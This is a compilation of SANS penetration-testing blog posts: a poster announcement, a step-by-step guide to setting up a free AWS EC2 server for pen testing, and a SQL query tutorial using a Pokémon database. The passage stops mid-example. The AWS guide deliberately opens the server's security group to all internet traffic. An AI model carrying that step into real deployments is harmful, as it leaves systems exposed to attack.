https://www.sans.org/webcasts/so-wanna-pen-tester-3-paths-106920

 

–Ed.

https://twitter.com/edskoudis


SANS Poster: Building a Better Pen Tester – PDF Download

 

Blog Post by: SANS Pen Test Team

 

It’s here! It’s here! The NEW SANS Penetration Testing Curriculum Poster has arrived (in PDF format)!

This blog post is for the downloadable PDF version of the new “Blueprint: Building a Better Pen Tester” Poster created by the SANS Pen Test Curriculum.

The front of the poster is full of useful information directly from the brains of SANS Pen Test Instructors. These are the pen testing tips they share with the students of SANS SEC560: Network Penetration Testing and Ethical Hacking and our other pen testing, ethical hacking, exploit dev, and vulnerability assessment courses.

The back of the poster has a checklist for scoping and rules of engagement, command line commands for Metasploit, Scapy, Nmap, and PowerShell, and information about Slingshot and the SANS Pen Test Curriculum.

Our hope is that the knowledge contained in this poster will help you become a better pen tester. And if you aren't currently a pen tester, that the information will help you become a more informed information security professional.

Training: Learn ethical hacking and penetration testing with one of our world-class instructors by taking SEC560: Network Penetration Testing and Ethical Hacking in person or online.

Download:

PENT-PSTR-SANS18-BP-V1-01

PENT-PSTR-SANS18-BP-V1-02

Download: PENT-PSTR-SANS18-BP-V1_web

 

SANS Webcast – Building A Better Pen Tester Poster

EdSkoudis_PenTestPoster_Blueprint_02_01092018

YouTube: https://youtu.be/feljUh5Q6V0

Desktop Wallpapers:

Click image for full-sized wallpaper file

Blueprint_Wallpaper_Pre-Eng&Recon – Pre-Engagement & Reconnaissance

 

Blueprint_Wallpaper_VA&PA – Vulnerability Analysis & Password Attacks

 

Blueprint_Wallpaper_Exp&Post-Exp – Exploitation & Post-Exploitation

 

Blueprint_Wallpaper_RE&Scoping – Rules of Engagement & Scoping Checklist

 


Putting My Zero Cents In: Using the Free Tier on Amazon Web Services (EC2)

By Jeff McJunkin
Counter Hack

Hello, dear readers! Many times when penetration testing, playing CTFs, or experimenting with new tools, I find myself needing ready access to a Linux installation of my choosing, a public IPv4 address, and… well, not a lot else, really. I like Virtual Private Servers (VPSs) for this purpose – essentially a VM hosted by somebody else, so I don't have to walk through Yet Another Linux Installation.

There are a number of VPS providers. I use Amazon Web Services, DigitalOcean, and Linode pretty frequently. Today, I’ll talk about getting started with Amazon Web Services, as they have a really nice deal to get your Linux (and Windows!) VPS fix for free*.

* Well, free for the first year, anyway. About $8.75 per month thereafter for Linux (~$12 for Windows), depending on bandwidth utilization and such.

To read more about Amazon’s offer, you can browse here. Some services are only free for the first year of a new account (like the EC2 instances I’ll be talking about today), whereas others are free forever (with usage limitations).

free_tier_offer

Okay, how does one go about setting up a new Amazon account? I admit my primary account was made before a free tier existed, so sadly my personal account doesn’t get access to those services. So I’ll walk through the setup on my Counter Hack email, instead. Shall we play a game?

Signing up for Amazon Web Services

First, browse to Amazon Web Services and click Sign Up in the upper-right corner.

You’ll see a page like the following. Fill out the requested information.
sign_up

After you click Continue, Amazon will send you a confirmation email. You don’t have to click on anything in the email. Amazon will ask for more information, as shown in the following screenshot:

contact_info

Note: I am not Jenny. Please don’t call her.

I also had to complete a phone verification and CAPTCHA, presumably to make sure people aren't signing up for thousands of free tier accounts. For reasons I can't understand, Amazon isn't using Google's reCAPTCHA service (though to be honest, I'm tired of filling out reCAPTCHAs for new accounts on Twitter).

phone_verification / phone_verification_complete

Note: I am still not Jenny. But her number is registered with a surprising number of in-store reward programs…

 

After filling out that last bit of info, you should arrive at a management screen that looks much like the following:

login_upperleft

Note that you’re automatically dropped into one of Amazon’s many sites. In my case, this management console is for us-east-2. You can see the other sites available in the upper right of the same page:

login_upperright

(Pro-tip: When doing penetration tests in a foreign country, talk to your lawyer, but consider setting up a server in the same foreign country. It can make dealing with international computer crimes laws considerably easier, since your scanning and C2 traffic will originate and terminate in the same country. I Am Not A Lawyer, this is not legal advice, etc.)

In my case, I’ll set up a new EC2 instance (or “server”, essentially, but you’ll probably hear the EC2 terminology) in us-east-2, so I don’t have to choose a new region. You may want to choose a region physically closer to you – for example, I live in Oregon, and there is an Oregon datacenter that should have lower latency.

To set up my new and free (for a year) server, I’ll click on Services, then on EC2 under the Compute section. There are certainly a lot of other Amazon Web Services available, but today we’ll limit ourselves to EC2.

services_ec2

Here we are at the EC2 Management Console. There are lots of options available, but let’s start by making our free Linux instance. Click on Launch Instance.

ec2_management_console – EC2 Management Console

There are seven steps to creating an instance, though the process can be streamlined and automated. In Step 1 (shown below), scroll down and find Ubuntu Server 16.04 LTS (HVM), SSD Volume Type – ami-82f4dae7, then click Select.

ec2_step1

Make sure t2.micro is selected (it was selected for me by default), then click Next: Configure Instance Details. After you get your security groups and SSH keys set up, you can use Review and Launch, but let's go one step at a time to make things easier.
ec2_step2

We don’t need to specify any of the options in Step 3 (we’re not launching multiple instances simultaneously, setting up more advanced network settings, etc.) so go ahead and click Next: Add Storage.
ec2_step3

Next we’re at the storage section. t2.micro instances only use Amazon’s Elastic Block Storage service or EBS for short. EBS is free for up to 30 gigabytes for the first year of utilization, so you’re safe to increase the default 8 gigabytes to 15 gigabytes under Size (GiB) for the Root volume:
ec2_step4
ebs_free_tier

Hopefully gigabytes vs gibibytes doesn’t result in a few pennies a month in charges. Make it a baker’s dozen of gigabytes if you want to play it safe.

Next, on step 5, we have the option of adding tags, which are convenient for automation and for keeping track of which instances are doing which tasks. For our tasks, though, we can just click Next: Configure Security Group to move to the next step.
ec2_step5

Next up is step 6, where we configure the security group for our new instance. By default, Amazon only allows SSH traffic, controlled by a default security policy. If you open up a netcat listener on port 8000, you won't be able to reach that port from across the internet (even if you configure iptables locally to permit that access).
ec2_step6

For the purpose of easily using our public IPv4 address with any TCP or UDP port, I've configured Amazon to allow all traffic to this new instance. First, click on Type and select All traffic, then set the Source to Custom with 0.0.0.0/0 as the source range. In CIDR notation, /0 means the entire IPv4 internet. I named the security group appropriately as lolsecurity, because I am essentially disabling the Amazon network firewall. Click Review and Launch to move on once you're done.
ec2_step6_continued
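
If CIDR notation is new to you, Python's standard `ipaddress` module makes it easy to sanity-check what a source range actually covers. A quick sketch (the 203.0.113.0/24 subnet is just a documentation example, not anything from my AWS setup):

```python
# Explore CIDR ranges with Python's standard ipaddress module.
import ipaddress

# /0 keeps zero prefix bits fixed, so it matches every IPv4 address.
everything = ipaddress.ip_network("0.0.0.0/0")
print(everything.num_addresses)   # 4294967296, i.e. 2**32

# A tighter rule for a real engagement might allow only your own
# testing subnet (203.0.113.0/24 is a reserved documentation range).
office = ipaddress.ip_network("203.0.113.0/24")
print(ipaddress.ip_address("203.0.113.45") in office)   # True
print(ipaddress.ip_address("198.51.100.7") in office)   # False
```

If you'd rather not open your instance to the whole internet like I did, a Custom source of your own /24 (or even a single /32 host) is the safer choice.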

Step 7 lets us review the settings from the prior steps before launching our new instance. You may want to double-check your work here, but click Launch when you're ready.

ec2_step7 – EC2 Instance Creation, Step 7

Surprise! We’re not quite done. Amazon doesn’t normally allow password-based authentication to Linux instances (a practice I agree with), so we need to configure SSH key-based authentication.

ec2_keypairs

In the first dropdown, select Create a new key pair, then choose a name. I wasn’t terribly creative, and I went with ec2 as the keypair name.
ec2_keypairs_2

Click Download Key Pair, then click the plurality-challenged Launch Instances button. Woohoo!
ec2_keypairs_3

Now we have a keypair and the resulting screen shows that our new instance has launched. Click on the instance name (i-02eb1e17779d19ee2 in my case) to get more details on that instance.
ec2_instance_launched

Here we see more information about this instance in particular. Note the built-in DNS name under Public DNS: ec2-18-217-213-237.us-east-2.compute.amazonaws.com in my case.
ec2_instance_running

Ubuntu discourages direct use of the root account, so the account that is automatically created is called ubuntu (case sensitive). If you're coming from macOS, Linux, or Windows 10 with Bash installed, you can use the downloaded SSH key (ec2.pem in my case) and log in as follows, accepting the SSH host key by typing yes and pressing Enter when asked:

jeff@blue:~/Downloads$ ssh -i ec2.pem ubuntu@ec2-18-217-213-237.us-east-2.compute.amazonaws.com
The authenticity of host 'ec2-18-217-213-237.us-east-2.compute.amazonaws.com (18.217.213.237)' can't be established.
ECDSA key fingerprint is SHA256:9SChnVhpbky3+Jg06Dtzw6F2Vp+cUGDwf9F1q9A/+9A.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'ec2-18-217-213-237.us-east-2.compute.amazonaws.com,18.217.213.237' (ECDSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0664 for 'ec2.pem' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "ec2.pem": bad permissions
Permission denied (publickey).

I, uh, totally meant to demonstrate that issue. By default, your freshly-downloaded SSH private key will have permissions that are excessive. The ssh client wants to discourage other people from being able to read your private key, so it doesn’t allow use of insecure private keys. If we’re in the same directory as the SSH key, we can fix the permissions on macOS or Linux by running the following command:

jeff@blue:~/Downloads$ chmod 600 ec2.pem
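
If the octal modes are unfamiliar, here's a hedged sketch of the same before-and-after using Python's `os` and `stat` modules on a throwaway stand-in file (your real key would be the downloaded ec2.pem):

```python
# Demonstrate the "too open" key permissions and the fix, in Python.
import os
import stat
import tempfile

# Create a stand-in for the downloaded key file.
fd, key_path = tempfile.mkstemp(suffix=".pem")
os.close(fd)

# 0o664 = owner rw, group rw, world r: ssh refuses keys this open.
os.chmod(key_path, 0o664)
bad_mode = stat.S_IMODE(os.stat(key_path).st_mode)
print(oct(bad_mode))    # 0o664

# 0o600 = owner read/write only, which ssh accepts.
os.chmod(key_path, 0o600)
good_mode = stat.S_IMODE(os.stat(key_path).st_mode)
print(oct(good_mode))   # 0o600

os.unlink(key_path)
```

The middle digit (group) and last digit (everyone else) are what ssh objects to; 600 zeroes both out.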

Now, let’s give ssh-ing in another shot, shall we?

jeff@blue:~/Downloads$ ssh -i ec2.pem ubuntu@ec2-18-217-213-237.us-east-2.compute.amazonaws.com
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-1041-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  Get cloud support with Ubuntu Advantage Cloud Guest:
    http://www.ubuntu.com/business/services/cloud

0 packages can be updated.
0 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ubuntu@ip-172-31-29-177:~$ 

Ah, now that’s much better. Run sudo -i to switch to running as the root user, as necessary.

Using Windows and PuTTY to Connect to Your Amazon Instance

If you’re using Windows (and not bash on Windows 10), you will need to set up an SSH client such as PuTTY. PuTTY uses a different format for the SSH key, so you’ll need to convert the PEM-format download you got from Amazon. Download and install PuTTY from their installation page if you haven’t already installed it.

Next, start up PuTTYgen to convert that SSH key.

PuTTYgen_1

Click on Load, to the right of Load an existing private key. Browse to the folder where you downloaded the Amazon EC2 private key, click the drop-down labeled PuTTY Private Key Files (*.ppk) and choose All Files (*.*), then select the downloaded EC2 private key.
PuTTYgen_2

PuTTYgen will let you know it has successfully imported the private key. Next we’ll need to save it in PuTTY’s own format. Click OK.
PuTTYgen_3

Next, click on Save private key on the main PuTTYgen window.
PuTTYgen_4

SSH keys can be encrypted with a password, but I’ll skip setting one in this case. “It’s not for production” is a great excuse, isn’t it? I use that one rather often.
PuTTYgen_5

Choose a download location and file name, then click Save.
PuTTYgen_6

Okay, we’re done with PuTTYgen. Close PuTTYgen and open PuTTY.
PuTTY_1

Type ubuntu@ and the Public DNS name we got from Amazon earlier into the Host Name (or IP address) window.
PuTTY_2

Next, click the plus icon on Connection in the left menu pane, then SSH, then Auth. Click Browse to find the private SSH key we exported just now from PuTTYgen.
PuTTY_3

Select your PuTTYgen-generated private key and click Open.
PuTTY_4

Next, go back to the Session area of PuTTY. I highly recommend saving these session settings by typing a name under Saved Sessions. I chose another uninteresting name of ec2-freetier. Click Save after you’ve pondered and typed an appropriate name.
PuTTY_5

Click Open to connect to your new Amazon instance once you’ve saved the session. You’ll get an SSH host key warning, since this is the first time you’ve connected to this new IP/hostname:port:SSH server combination.
PuTTY_6

Finally, you’re in that remote SSH session using PuTTY! The conversion process is only a one-time pain, so using PuTTY can be pretty convenient.
PuTTY_7

Conclusion

Using public cloud resources doesn't have to be a pain, but there's some setup work that isn't entirely intuitive. With these directions you can get a free t2.micro Linux server for a full year, and you can run a t2.micro Windows instance for free for a year as well!

I hope this helps! Enjoy your holiday hacking season, and I hope you enthusiastically partake of any challenges that life (or Counter Hack and SANS) sends your way. :)

Until next time…

– Jeff McJunkin

@jeffmcjunkin

 


Your Pokemon Guide for Essential SQL Pen Test Commands

By Joshua Wright
Counter Hack

As a pen tester, it’s not enough to exploit targets and get shells. That’s great (and it’s a big part of what we do), but the real value to the customer is to demonstrate what the effective risk is from the successful exploitation of a vulnerability. In order to answer this question, I find myself interrogating data on compromised systems, trying to make sense of what’s available and what the disclosure of the data will mean to my customer.

Often, I find myself looking at a bunch of data in a SQL database. This might be a native SQL database (usually MSSQL, SQLite3, MySQL, Oracle, etc.), but sometimes it’s a database I’ve created by importing CSV files, JSON data, or other data formats. As a former DBA (a long, long time ago) I feel really comfortable at a SQL> prompt. In this article I’ll offer some quick tips on getting useful data out of a database.

I’m going to use a Pokémon Pokedex SQLite3 database as my data source for examples. This database is the labor-of-love project from Eevee. Special thanks to Eevee for making this complex database available.

Data Structures

Identify the structure of tables, indexes, and other objects using the .schema command:

sqlite> .schema
CREATE TABLE item_pockets (
id INTEGER NOT NULL,
identifier VARCHAR(79) NOT NULL,
PRIMARY KEY (id)
);
CREATE TABLE pokeathlon_stats (
id INTEGER NOT NULL,
identifier VARCHAR(79) NOT NULL,
PRIMARY KEY (id)
);
...

This database has several tables. If you want to look at the structure of a single table, specify a table:

sqlite> .schema pokemon
CREATE TABLE pokemon (
id INTEGER NOT NULL,
identifier VARCHAR(79) NOT NULL,
species_id INTEGER,
height INTEGER NOT NULL,
weight INTEGER NOT NULL,
base_experience INTEGER NOT NULL,
"order" INTEGER NOT NULL,
is_default BOOLEAN NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY(species_id) REFERENCES pokemon_species (id),
CHECK (is_default IN (0, 1))
);
CREATE INDEX ix_pokemon_order ON pokemon ("order");
CREATE INDEX ix_pokemon_is_default ON pokemon (is_default);

Note that the .schema command is very SQLite-specific. Other databases (MySQL, for example) use SHOW TABLES and DESC tablename instead. Most of the other commands shown in this article are generic enough to work across any database.

Retrieving Some or All

We retrieve data from the database using the SQL SELECT statement (I've also issued the SQLite3 .headers on command to turn on column labels):

sqlite> select * from pokemon;
id|identifier|species_id|height|weight|base_experience|order|is_default
1|bulbasaur|1|7|69|64|1|1
2|ivysaur|2|10|130|142|2|1
3|venusaur|3|20|1000|236|3|1
4|charmander|4|6|85|62|5|1
5|charmeleon|5|11|190|142|6|1
6|charizard|6|17|905|240|7|1
7|squirtle|7|5|90|63|10|1
8|wartortle|8|10|225|142|11|1
9|blastoise|9|16|855|239|12|1
10|caterpie|10|3|29|39|14|1
...

By specifying *, we indicate that we want to retrieve all of the columns. If you only want a few specific columns, name them in the order you want them to appear:

sqlite> select id, identifier, weight, height from pokemon;
id|identifier|weight|height
1|bulbasaur|69|7
2|ivysaur|130|10
3|venusaur|1000|20
4|charmander|85|6
5|charmeleon|190|11
6|charizard|905|17
7|squirtle|90|5
8|wartortle|225|10
9|blastoise|855|16
10|caterpie|29|3
...

The pokemon table has a lot of records in it. If you only want the first 5 records, add LIMIT 5 to the end of your query:

sqlite> select id, identifier, weight, height, "order" from pokemon limit 5;
id|identifier|weight|height|order
1|bulbasaur|69|7|1
2|ivysaur|130|10|2
3|venusaur|1000|20|3
4|charmander|85|6|5
5|charmeleon|190|11|6
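
The same queries work when driven from a script, which is handy when you're triaging a database you've exfiltrated during a test. A hedged sketch using Python's sqlite3 module against a tiny stand-in table (the real Pokedex table has more columns):

```python
# Run the SELECT ... LIMIT query from Python instead of the sqlite3 shell.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE pokemon (id INTEGER PRIMARY KEY, "
             "identifier TEXT, weight INTEGER, height INTEGER)")
conn.executemany("INSERT INTO pokemon VALUES (?, ?, ?, ?)", [
    (1, "bulbasaur", 69, 7),
    (2, "ivysaur", 130, 10),
    (3, "venusaur", 1000, 20),
    (4, "charmander", 85, 6),
    (5, "charmeleon", 190, 11),
    (6, "charizard", 905, 17),
])

# LIMIT 5 caps the result set at the first five records.
rows = conn.execute("SELECT id, identifier FROM pokemon LIMIT 5").fetchall()
for row in rows:
    print(row)
```

On a compromised host, pointing `sqlite3.connect()` at the database file you found gives you the same interrogation power without needing an interactive client.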

Unique Data

Individual rows of data will often have duplicate values present. We can get a unique list of the values present by using the DISTINCT modifier in a query. For example, consider the structure of the Pokedex contest_type_names table:

sqlite> .schema contest_type_names
CREATE TABLE contest_type_names (
contest_type_id INTEGER NOT NULL,
local_language_id INTEGER NOT NULL,
name VARCHAR(79),
flavor TEXT,
color TEXT,
PRIMARY KEY (contest_type_id, local_language_id),
FOREIGN KEY(contest_type_id) REFERENCES contest_types (id),
FOREIGN KEY(local_language_id) REFERENCES languages (id)
);
CREATE INDEX ix_contest_type_names_name ON contest_type_names (name);
sqlite> select * from contest_type_names;
contest_type_id|local_language_id|name|flavor|color
1|5|Sang-froid|Épicé|Rouge
1|9|Cool|Spicy|Red
2|5|Beauté|Sec|Bleu
2|9|Beauty|Dry|Blue
3|5|Grâce|Sucré|Rose
3|9|Cute|Sweet|Pink
4|5|Intelligence|Amère|Vert
4|9|Smart|Bitter|Green
5|5|Robustesse|Acide|Jaune
5|9|Tough|Sour|Yellow
1|10||Ostrá|
5|10|Síla||
2|10|Krása|Suchá|

The returned data set is fairly small, but we can focus it further. What if we are only interested in the unique color assignments given to Pokémon contest types?

sqlite> select distinct(color) from contest_type_names;
Rouge
Red
Bleu
Blue
Rose
Pink
Vert
Green
Jaune
Yellow

Conditional Expressions

Often you’ll want to filter the returned data with a conditional expression, denoted with a WHERE clause. Using a WHERE clause allows you to specify the nature of the data you want returned, matching one or more columns to values you specify. For example, what if we only want to see information about Pikachu in the pokemon table?

sqlite> .schema pokemon
CREATE TABLE pokemon (
id INTEGER NOT NULL,
identifier VARCHAR(79) NOT NULL,
species_id INTEGER,
height INTEGER NOT NULL,
weight INTEGER NOT NULL,
base_experience INTEGER NOT NULL,
"order" INTEGER NOT NULL,
is_default BOOLEAN NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY(species_id) REFERENCES pokemon_species (id),
CHECK (is_default IN (0, 1))
);
CREATE INDEX ix_pokemon_order ON pokemon ("order");
CREATE INDEX ix_pokemon_is_default ON pokemon (is_default);
sqlite> select * from pokemon where identifier = "pikachu";
id|identifier|species_id|height|weight|base_experience|order|is_default
25|pikachu|25|4|60|112|32|1

In addition to using matching expressions, SQLite3 also supports common comparison operators, shown here:

Operator Meaning
= Equal to
!= Not equal to
< Less than
> Greater than
<= Less than or equal to
>= Greater than or equal to

Let’s use this to find out if there are any Pokémon smaller than Pikachu (who appears to be 4 decimeters tall from the previous query):

sqlite> select identifier from pokemon where height < 4;
caterpie
weedle
pidgey
rattata
spearow
paras
...

We can combine multiple WHERE expressions together too. For example, which Pokémon are shorter than Pikachu but weigh substantially more? (Note that here I’ve pressed Enter to start a new line, prompting SQLite3 to produce a continuation prompt of ...>.)

sqlite> select identifier, height, weight from pokemon
...> where height < 4 and weight > 190;
klink|3|210
durant|3|330

Wildcards

SQL allows you to specify wildcards in your WHERE clauses using the keyword LIKE, with _ matching any single character and % matching any sequence of zero or more characters. Using the pokemon_species_names table, let’s identify all the genus values that begin with Dr:

sqlite> .schema pokemon_species_names
CREATE TABLE pokemon_species_names (
pokemon_species_id INTEGER NOT NULL,
local_language_id INTEGER NOT NULL,
name VARCHAR(79),
genus TEXT,
PRIMARY KEY (pokemon_species_id, local_language_id),
FOREIGN KEY(pokemon_species_id) REFERENCES pokemon_species (id),
FOREIGN KEY(local_language_id) REFERENCES languages (id)
);
CREATE INDEX ix_pokemon_species_names_name ON pokemon_species_names (name);
sqlite> select name, genus from pokemon_species_names where genus like 'Dr%';
name|genus
Nidoqueen|Drill
Nidoking|Drill
Rhydon|Drill
Hypotrempe|Dragon
Seeper|Drache
Horsea|Dragón
Horsea|Drago
Horsea|Dragon
...
Simipour|Drenaje
Munna|Dream Eater
Musharna|Drowsing
Muplodocus|Dragon
Viscogon|Drache
Goodra|Dragón
...

Notice that some of the genus types are Dragon and Dragón. If we want to match either of those two, we can use the _ modifier to match the o and ó characters:

sqlite> select name, genus from pokemon_species_names where genus like 'Drag_n';
name|genus
Hypotrempe|Dragon
Horsea|Dragón
Horsea|Dragon
Hypocéan|Dragon
Seadra|Dragón
Seadra|Dragon
Minidraco|Dragon
Dratini|Dragón
Dratini|Dragon
Draco|Dragon
...

You can also search for the middle portion of a matching string by adding % to the beginning and the end of the expression. For example, we can search for any genus with the word eat:

sqlite> select name, genus from pokemon_species_names
...> where genus like '%eat%';
name|genus
Castform|Weather
Munchlax|Big Eater
Munna|Dream Eater
Heatmor|Anteater

Although it doesn’t show in this output, %eat% will match values starting or ending with eat as well (i.e., there don’t have to be preceding or following characters for a match).
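The same matching behavior can be sketched outside the sqlite3 shell using Python’s sqlite3 module. The table and rows below are invented for illustration:

```python
import sqlite3

# Toy table with invented rows, just to illustrate LIKE semantics.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE genera (genus TEXT)")
conn.executemany("INSERT INTO genera VALUES (?)",
                 [("Dragon",), ("Dragón",), ("Eater",), ("Big Eater",), ("Weather",)])

# '_' matches exactly one character; '%' matches zero or more.
dragons = [g for (g,) in conn.execute(
    "SELECT genus FROM genera WHERE genus LIKE 'Drag_n'")]
print(dragons)   # both spellings match the single-character wildcard

eats = [g for (g,) in conn.execute(
    "SELECT genus FROM genera WHERE genus LIKE '%eat%'")]
print(eats)      # 'Eater' matches too: '%' happily matches zero characters
```

Note that SQLite’s LIKE is case-insensitive for ASCII by default, which is why 'Eater' matches '%eat%'.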

Ordering Data

Sometimes you want to change the order of the data being returned. No problem: simply add ORDER BY followed by the column you want to use. You can add multiple comma-separated columns in the ORDER BY clause as well. By default, values are listed in ascending order, but this can be changed by adding the keyword DESC to the end of the ORDER BY expression.

For example, the abilities table in the Pokémon database lists ability identifiers, sorted by default on the id field. If you want to change the sort order to use the generation_id column, add an ORDER BY clause:

sqlite> .schema abilities
CREATE TABLE abilities (
id INTEGER NOT NULL,
identifier VARCHAR(79) NOT NULL,
generation_id INTEGER NOT NULL,
is_main_series BOOLEAN NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY(generation_id) REFERENCES generations (id),
CHECK (is_main_series IN (0, 1))
);
CREATE INDEX ix_abilities_is_main_series ON abilities (is_main_series);
sqlite> select * from abilities order by generation_id;
id|identifier|generation_id|is_main_series
1|stench|3|1
2|drizzle|3|1
3|speed-boost|3|1
4|battle-armor|3|1
5|sturdy|3|1
6|damp|3|1
7|limber|3|1
...
162|victory-star|5|1
163|turboblaze|5|1
164|teravolt|5|1
10001|mountaineer|5|0
10002|wave-rider|5|0
10003|skater|5|0
10004|thrust|5|0
10005|perception|5|0
...
189|primordial-sea|6|1
190|desolate-land|6|1
191|delta-stream|6|1
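The multi-column and descending sorts mentioned above can be sketched with Python’s sqlite3 module and a tiny invented subset of the abilities data:

```python
import sqlite3

# Miniature stand-in for the abilities table (rows invented for illustration).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE abilities (id INTEGER, identifier TEXT, generation_id INTEGER)")
conn.executemany("INSERT INTO abilities VALUES (?, ?, ?)",
                 [(1, "stench", 3), (2, "drizzle", 3), (163, "turboblaze", 5)])

# Newest generation first; ties broken by ascending id.
rows = [r[0] for r in conn.execute(
    "SELECT identifier FROM abilities ORDER BY generation_id DESC, id")]
print(rows)  # ['turboblaze', 'stench', 'drizzle']
```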

Cross-table Queries

When people start out designing databases, they often try to stuff everything into a single table, even when it’s inefficient to do so. A more mature design moves data that changes less frequently, or that should be isolated from related records, into a different table sharing an identifier that allows us to query both tables to produce one set of results.

For example, consider the pokemon_species and pokemon_species_names tables shown below in SQL and visualized forms (courtesy of WWW SQL Designer):

sqlite> .schema pokemon_species
CREATE TABLE pokemon_species (
id INTEGER NOT NULL,
identifier VARCHAR(79) NOT NULL,
generation_id INTEGER,
evolves_from_species_id INTEGER,
evolution_chain_id INTEGER,
color_id INTEGER NOT NULL,
shape_id INTEGER NOT NULL,
habitat_id INTEGER,
gender_rate INTEGER NOT NULL,
capture_rate INTEGER NOT NULL,
base_happiness INTEGER NOT NULL,
is_baby BOOLEAN NOT NULL,
hatch_counter INTEGER NOT NULL,
has_gender_differences BOOLEAN NOT NULL,
growth_rate_id INTEGER NOT NULL,
forms_switchable BOOLEAN NOT NULL,
"order" INTEGER NOT NULL,
conquest_order INTEGER,
PRIMARY KEY (id),
FOREIGN KEY(generation_id) REFERENCES generations (id),
FOREIGN KEY(evolves_from_species_id) REFERENCES pokemon_species (id),
FOREIGN KEY(evolution_chain_id) REFERENCES evolution_chains (id),
FOREIGN KEY(color_id) REFERENCES pokemon_colors (id),
FOREIGN KEY(shape_id) REFERENCES pokemon_shapes (id),
FOREIGN KEY(habitat_id) REFERENCES pokemon_habitats (id),
CHECK (is_baby IN (0, 1)),
CHECK (has_gender_differences IN (0, 1)),
FOREIGN KEY(growth_rate_id) REFERENCES growth_rates (id),
CHECK (forms_switchable IN (0, 1))
);
CREATE INDEX ix_pokemon_species_order ON pokemon_species ("order");
CREATE INDEX ix_pokemon_species_conquest_order ON pokemon_species (conquest_order);
sqlite> .schema pokemon_species_names
CREATE TABLE pokemon_species_names (
pokemon_species_id INTEGER NOT NULL,
local_language_id INTEGER NOT NULL,
name VARCHAR(79),
genus TEXT,
PRIMARY KEY (pokemon_species_id, local_language_id),
FOREIGN KEY(pokemon_species_id) REFERENCES pokemon_species (id),
FOREIGN KEY(local_language_id) REFERENCES languages (id)
);

[Figure: visualized relationship between the pokemon_species and pokemon_species_names tables]

In these two tables, the data for name and genus lives in a different table than the primary Pokémon species information. The pokemon_species_names data probably changes less often than the data in pokemon_species, so this is a pretty reasonable design. However, how do we formulate a query across the two tables that returns the Pokémon identifier and genus in the same result set?

The answer is in the SQL join capability. Take a look:

sqlite> select identifier, genus from pokemon_species, pokemon_species_names where
...> pokemon_species.id = pokemon_species_names.pokemon_species_id and
...> local_language_id = 9;
bulbasaur|Seed
ivysaur|Seed
venusaur|Seed
charmander|Lizard
charmeleon|Flame
charizard|Flame
squirtle|Tiny Turtle
wartortle|Turtle
blastoise|Shellfish
caterpie|Worm
...

Here I’ve selected columns from two tables. The WHERE clause tells SQL to associate records from pokemon_species with records from pokemon_species_names when the id and pokemon_species_id columns match. I’ve also limited the output to rows where local_language_id is 9, which is English.

In this example, identifier and genus are unique column names across the two tables. If a column name appears in both tables, you must use dot-notation to specify the table name followed by the column name (e.g. pokemon_species.identifier, pokemon_species_names.genus).
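The same cross-table query can also be written with the explicit JOIN ... ON syntax, which many people find easier to read. A minimal sketch with Python’s sqlite3 and invented rows:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE pokemon_species (id INTEGER PRIMARY KEY, identifier TEXT);
CREATE TABLE pokemon_species_names (
    pokemon_species_id INTEGER, local_language_id INTEGER, genus TEXT);
-- Rows invented for illustration
INSERT INTO pokemon_species VALUES (1, 'bulbasaur'), (4, 'charmander');
INSERT INTO pokemon_species_names VALUES
    (1, 9, 'Seed'), (1, 5, 'Graine'), (4, 9, 'Lizard');
""")

# Explicit JOIN ... ON is equivalent to the comma-join plus WHERE form.
rows = conn.execute("""
    SELECT pokemon_species.identifier, pokemon_species_names.genus
    FROM pokemon_species
    JOIN pokemon_species_names
      ON pokemon_species.id = pokemon_species_names.pokemon_species_id
    WHERE local_language_id = 9
    ORDER BY pokemon_species.identifier
""").fetchall()
print(rows)  # [('bulbasaur', 'Seed'), ('charmander', 'Lizard')]
```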

Grouping Data

One powerful SQL statement we haven’t yet covered is the GROUP BY operator. Using GROUP BY, we can collect the returned results into groups. For example, adding GROUP BY genus to the previous query will group the results by the genus column:

sqlite> select identifier, genus from pokemon_species, pokemon_species_names
...> where pokemon_species.id = pokemon_species_names.pokemon_species_id and
...> local_language_id = 9 GROUP BY genus;
landorus|Abundance
seedot|Acorn
arceus|Alpha
chinchou|Angler
trapinch|Ant Pit
heatmor|Anteater
dedenne|Antenna
marill|Aqua Mouse
azumarill|Aqua Rabbit
hariyama|Arm Thrust

You may be thinking “this doesn’t really seem that useful…couldn’t we get the same result with ORDER BY instead?” You’d be correct, except that GROUP BY is often used with aggregate functions, one of the most powerful tools in your SQL arsenal.

Aggregate Functions

Aggregate functions are a kind of virtual column, allowing you to calculate simple operations on data in tables. Use an aggregate function to calculate a value using one of the following functions:

Function Meaning
COUNT Count the total records
MAX Identify the largest value
MIN Identify the smallest value
SUM Add the values together
AVG Calculate an average value
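Each of these functions can be tried against a toy table. Here is a sketch with Python’s sqlite3, reusing weights seen earlier in the article:

```python
import sqlite3

# Tiny table reusing weights shown earlier (pikachu, klink, durant).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE pokemon (identifier TEXT, weight INTEGER)")
conn.executemany("INSERT INTO pokemon VALUES (?, ?)",
                 [("pikachu", 60), ("klink", 210), ("durant", 330)])

# All five aggregates computed in a single pass over the table.
row = conn.execute(
    "SELECT COUNT(*), MIN(weight), MAX(weight), SUM(weight), AVG(weight) "
    "FROM pokemon").fetchone()
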